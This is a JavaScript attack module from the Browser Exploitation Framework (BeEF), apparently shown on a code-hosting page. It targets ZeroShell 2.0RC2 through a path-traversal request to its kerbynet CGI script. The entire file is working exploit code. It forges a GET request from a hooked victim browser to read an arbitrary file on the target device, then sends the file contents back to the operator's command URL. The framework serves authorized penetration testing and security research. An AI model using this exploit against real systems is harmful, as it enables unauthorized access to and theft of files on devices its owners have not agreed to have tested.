Path: blob/master/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var rhost = '<%= @rhost %>';8var rport = '<%= @rport %>';9var rfile = '<%= @rfile %>';1011var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;1213beef.debug("[ZeroShell_2.0RC2_file_disclosure] Trying to retrieve local file: " + uri);14beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){15if(response.status_code == 200){16beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());17}else{18beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: GET request failed.", beef.are.status_error());19}20});21});22232425